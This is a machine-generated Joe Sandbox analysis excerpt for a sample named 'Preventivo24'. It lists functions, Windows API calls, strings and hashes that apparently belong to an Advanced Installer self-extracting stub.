GetActiveWindow.USER32 ref: 00FEB9FD
SetLastError.KERNEL32(0000000E,?,?,?), ref: 00FEBA3A
GetCurrentThreadId.KERNEL32 ref: 00FEBAC5
SetWindowTextW.USER32(?,00000000), ref: 00FEBB54
GetDlgItem.USER32(?,000003E9), ref: 00FEBB62
SetWindowTextW.USER32(00000000,?), ref: 00FEBB6E

Part of subcall function 00FE1DC0: GetDlgItem.USER32(?,00000002), ref: 00FE1DDD
Part of subcall function 00FE1DC0: GetWindowRect.USER32(00000000,?), ref: 00FE1DF3
Part of subcall function 00FE1DC0: ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E08
Part of subcall function 00FE1DC0: InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E13
Part of subcall function 00FE1DC0: GetDlgItem.USER32(?,000003E9), ref: 00FE1E21
Part of subcall function 00FE1DC0: GetWindowRect.USER32(00000000,?), ref: 00FE1E37
Part of subcall function 00FE1DC0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00FE1E76

GetDlgItem.USER32(?,00000002), ref: 00FEBBFE
SetWindowTextW.USER32(00000000,00000000), ref: 00FEBC06

Part of subcall function 00E9C3A0: RaiseException.KERNEL32(?,?,00000000,00000000,00FA84DC,C0000005,00000001,B5580983,011C63B8,0093A190,?,011D002C,011C63B8,010B1F80,000000FF), ref: 00E9C3AC

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Item$RectText$ActiveAllocateCurrentErrorExceptionHeapInvalidateLastRaiseShowThread
String ID:
API String ID: 1085195845-0
Opcode ID: 7f0c741ec65566daf911255301614d4a40d7471e6b8a5d507bfbc48ef57dfd46
Instruction ID: 7c86e4ebeab9920a629eed570ecaec71cd13de82651e047679956852aaa70c17
Opcode Fuzzy Hash: 7f0c741ec65566daf911255301614d4a40d7471e6b8a5d507bfbc48ef57dfd46
Instruction Fuzzy Hash: 4F71BB31905649EFCB24DF69CC49B5EBBB1FF04320F148629E525A72D0DB74A940DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E933C0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 263
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 00E934B7
GetProcAddress.KERNEL32(00000000), ref: 00E934BE
CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,10000000,00000001,S-1-5-18,10000000,00000001), ref: 00E935B7

Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A

GetWindowsDirectoryW.KERNEL32(?,00000104,B5580983,?,?), ref: 00E93504
GetTempPathW.KERNEL32(00000104,?,B5580983,?,?), ref: 00E935DA

Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C

Strings

GetTempPath2W, xrefs: 00E934AD
\SystemTemp\, xrefs: 00E9350A
Kernel32.dll, xrefs: 00E934B2
S-1-5-32-544, xrefs: 00E9356A
S-1-5-18, xrefs: 00E93559

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireDirectoryRelease$AddressConditionCreateHandleModulePathProcTempVariableWakeWindows
String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
API String ID: 846588460-595641723
Opcode ID: bc19dee92dbae7d670c217ea156781f755ee6e5456291a74f081d7834486a816
Instruction ID: 34c16807c22e3e83f63bf97cee112f845f15ccab66e8272f6138561aae711382
Opcode Fuzzy Hash: bc19dee92dbae7d670c217ea156781f755ee6e5456291a74f081d7834486a816
Instruction Fuzzy Hash: CAA1D4B1D05208EBDB24EFA8DD89BDDB7B4AF08714F1001A9E919A7281DBB45F84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01089FCC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(?,?,?,0108A312,011CE8E4,?,?,?,01003A0D,?,?,?,00000001,?), ref: 01089FDE
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,0108A312,011CE8E4,?,?,?,01003A0D,?,?,?,00000001), ref: 01089FF3
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0108A06F

Strings

atlthunk.dll, xrefs: 01089FEE
AtlThunk_InitData, xrefs: 0108A01B
AtlThunk_FreeData, xrefs: 0108A049
AtlThunk_DataToCode, xrefs: 0108A032
AtlThunk_AllocateData, xrefs: 0108A004

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 3c00b45bf39323aec605b3530f49ce3b803912eed7f3312ffd03f17770d3da21
Instruction ID: 733d05bf5509a9c864a0f6bb9ee365d3e9571e4bdac714ad934a102d1c5ef589
Opcode Fuzzy Hash: 3c00b45bf39323aec605b3530f49ce3b803912eed7f3312ffd03f17770d3da21
Instruction Fuzzy Hash: CC010C30745301FBD629F6259C02B9E3F845B12784F04006AF9C477656E7725146CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00FDFD30 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 304
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeThread.KERNEL32(?,?,B5580983,00000000,00000000,?,?,?,00000000,010FC815,000000FF,?,00FD8C32,?,000000DC,00000000), ref: 00FDFD76

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FDFE2B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FDFE55

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A

WriteFile.KERNEL32(?,000000DC,?,000000FF,00000000,CLOSE,00000005), ref: 00FDFFDA
FlushFileBuffers.KERNEL32(?), ref: 00FDFFE3

Part of subcall function 01003BE0: CloseHandle.KERNEL32(?,B5580983,?,00000010,?,00000000,01103163,000000FF,?,00FDF542,00000000,00000000,00000000,00000001,?,0000000D), ref: 01003C1A

Strings

CLOSE, xrefs: 00FDFF9D, 00FDFFAF, 00FDFFB9
Advinst_Estimate_, xrefs: 00FDFDC2, 00FDFDD4, 00FDFDDE

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$File$BuffersCloseCodeExitFindFlushHandleHeapProcessResourceThreadWrite
String ID: Advinst_Estimate_$CLOSE
API String ID: 1271795120-755230127
Opcode ID: 8c7484160dea0b47b8ce8465517712afa01e04e9626c392769c6e1cdeef5170c
Instruction ID: dc2fc29dd0234a01c46fa471952932a3670211f5a6435525b64aa92934a9cf0d
Opcode Fuzzy Hash: 8c7484160dea0b47b8ce8465517712afa01e04e9626c392769c6e1cdeef5170c
Instruction Fuzzy Hash: 82B10231E00249DFDB05DBA8CC55BAEBBB5EF04320F184169E925A73D1DB749E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7A40 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 286
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,B5580983,00000000,00000000,?), ref: 00FC7A9B
GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?,?,00000000,00000000), ref: 00FC7C3D
Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,00000000,00000000), ref: 00FC7CE4
CopyFileW.KERNEL32(?,?,00000000,?,?,00000000,00000000), ref: 00FC7D06
Wow64RevertWow64FsRedirection.KERNEL32(00000000,?,?,00000000), ref: 00FC7D32

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

DeleteFileW.KERNEL32(?,B5580983,00000000,00000000,010B1B50,000000FF,?,80070057,80004005,?), ref: 00FC7DED

Strings

shim_clone, xrefs: 00FC7C37

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Wow64$File$Redirection$AllocateCopyDeleteDisableFolderHeapNamePathRevertTemp
String ID: shim_clone
API String ID: 4011074531-3944563459
Opcode ID: a3f9e2de153ef8256dae9bb0023cf8142c6b5d89ff1d9daf326568e1b48223f8
Instruction ID: d803ed96398f787005e7c9932848bd908bd7b24443ded8fd3c470b62134ec1b6
Opcode Fuzzy Hash: a3f9e2de153ef8256dae9bb0023cf8142c6b5d89ff1d9daf326568e1b48223f8
Instruction Fuzzy Hash: B8B1057090475A8FDB24EB24CD45BAAB7F5EF44310F1440EDE90AA7281EB34AE45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00FBAD40 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 252
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,B5580983), ref: 00FBAF96
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00FBAFAA
RegCloseKey.ADVAPI32(00000000), ref: 00FBB00C

Strings

RegOpenKeyTransactedW, xrefs: 00FBAFA4
Advapi32.dll, xrefs: 00FBAF91

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 4190037839-3913318428
Opcode ID: 10c43c516ee70e1484fdbad3f521ffb1f9d554b5e2a300041a97e067c622e0fb
Instruction ID: acb9ef8977bd3649b96e60457c7b4b7520717bf5cbca2fb6fdfd06e2521d9fd9
Opcode Fuzzy Hash: 10c43c516ee70e1484fdbad3f521ffb1f9d554b5e2a300041a97e067c622e0fb
Instruction Fuzzy Hash: A9A17DB0D00208DFDB24DF69C945BAEBBF4BF48314F10855DE869A7281DB74AA44DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9A70 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 248fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,?), ref: 00FE9C6E
SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 00FE9CD0
SetEndOfFile.KERNEL32(?), ref: 00FE9CD9
FindCloseChangeNotification.KERNEL32(?), ref: 00FE9CF2

Strings

Not enough disk space to extract file:, xrefs: 00FE9B4B
%sholder%d.aiph, xrefs: 00FE9C4A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointer
String ID: %sholder%d.aiph$Not enough disk space to extract file:
API String ID: 3635197886-929304071
Opcode ID: 6fd002580227d3400bb98be6f02150c613622f0b4deba0ce3d8ca7e786cffe23
Instruction ID: 673423064845e95f68668301c8daacea42d0347aa25e04c10b4e114f43a3fd61
Opcode Fuzzy Hash: 6fd002580227d3400bb98be6f02150c613622f0b4deba0ce3d8ca7e786cffe23
Instruction Fuzzy Hash: 6791CD75E042099BCB14DF69CC45BAEB7B5FF88320F244629E825A7391DB75AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010085F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(000000FF,-00000400,?,00000002,00000400,B5580983,?,?,?), ref: 01008696
GetLastError.KERNEL32(?,?,?), ref: 010086A4
ReadFile.KERNEL32(000000FF,00000000,00000400,?,00000000,?,?,?), ref: 010086BF

Strings

ADVINSTSFX, xrefs: 010086F3, 010087AE

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$ErrorLastPointerRead
String ID: ADVINSTSFX
API String ID: 64821003-4038163286
Opcode ID: 47c201b1a2356d6e71702956eb991b95e3f97db75802ca0e3eaacaec1cabb829
Instruction ID: 6b181d55ff1bfb35cc7a35df53294c68c01fae0fd36d9832110e80edc46f9957
Opcode Fuzzy Hash: 47c201b1a2356d6e71702956eb991b95e3f97db75802ca0e3eaacaec1cabb829
Instruction Fuzzy Hash: 8061D475E002098BEB16CF68C880BBEBBF5FB49314F1482AAE555A72C5D734D941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD2E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 179fileCOMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,?,010B6CAD,000000FF,?,00FBD638,?), ref: 00FBD390

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

RemoveDirectoryW.KERNEL32(?,B5580983,?,?,00000000,?,?,010B6CAD,000000FF,?,00FBD638,?,00000000), ref: 00FBD3CB
GetLastError.KERNEL32(?,B5580983,?,?,00000000,?,?,010B6CAD,000000FF,?,00FBD638,?,00000000), ref: 00FBD3DB
DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983), ref: 00FBD4B0
GetLastError.KERNEL32(?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983,?,?,00000000,?,?,010B6CAD), ref: 00FBD4FB

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Strings

\\?\, xrefs: 00FBD351, 00FBD363, 00FBD36D, 00FBD471, 00FBD483, 00FBD48D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DirectoryErrorLastRemove$DeleteFileFindHeapProcessResource
String ID: \\?\
API String ID: 728736790-4282027825
Opcode ID: 52c11c41b31f0855d4a4e7d792b04238134ca84e5ad38631f5ff4222c4db54e4
Instruction ID: a3db61d0d729a64e586490a5f0e77142de9d901afbbbc05d486b0c203be5edb8
Opcode Fuzzy Hash: 52c11c41b31f0855d4a4e7d792b04238134ca84e5ad38631f5ff4222c4db54e4
Instruction Fuzzy Hash: 5551D136A00618DFDB14DFA9C845BAEB7F4FF05720F184569E825E7381EB7898009F92

Uniqueness

Uniqueness Score: -1.00%

Function 00E9C1B1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00E9C25F
GetWindowLongW.USER32(?,000000FC), ref: 00E9C26E
CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00E9C289
GetWindowLongW.USER32(?,000000FC), ref: 00E9C2A3
SetWindowLongW.USER32(?,000000FC,?), ref: 00E9C2B5

Strings

$, xrefs: 00E9C1E1

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 56429f8f8be1b321a491c606b7e9824fadc6f43a26f5d4a9fdb1f92cc538c50b
Instruction ID: b746e1acd727335417459b70dcf6ade232960ce1a303c15c4e0a81278b373e45
Opcode Fuzzy Hash: 56429f8f8be1b321a491c606b7e9824fadc6f43a26f5d4a9fdb1f92cc538c50b
Instruction Fuzzy Hash: 6A417AB1609706AFC704DF59C884A1AFBF5FF89324F144A1AF964932A0C732E894CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6570 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,B5580983,00000000), ref: 00FA65B5
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00FA65DE
RegCreateKeyExW.KERNEL32(?,00FBB09F,00000000,00000000,00000000,00000000,00000000,00000000,?,B5580983,00000000), ref: 00FA6637
RegCloseKey.ADVAPI32(00000000), ref: 00FA664A

Strings

RegCreateKeyTransactedW, xrefs: 00FA65D8
Advapi32.dll, xrefs: 00FA65B0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

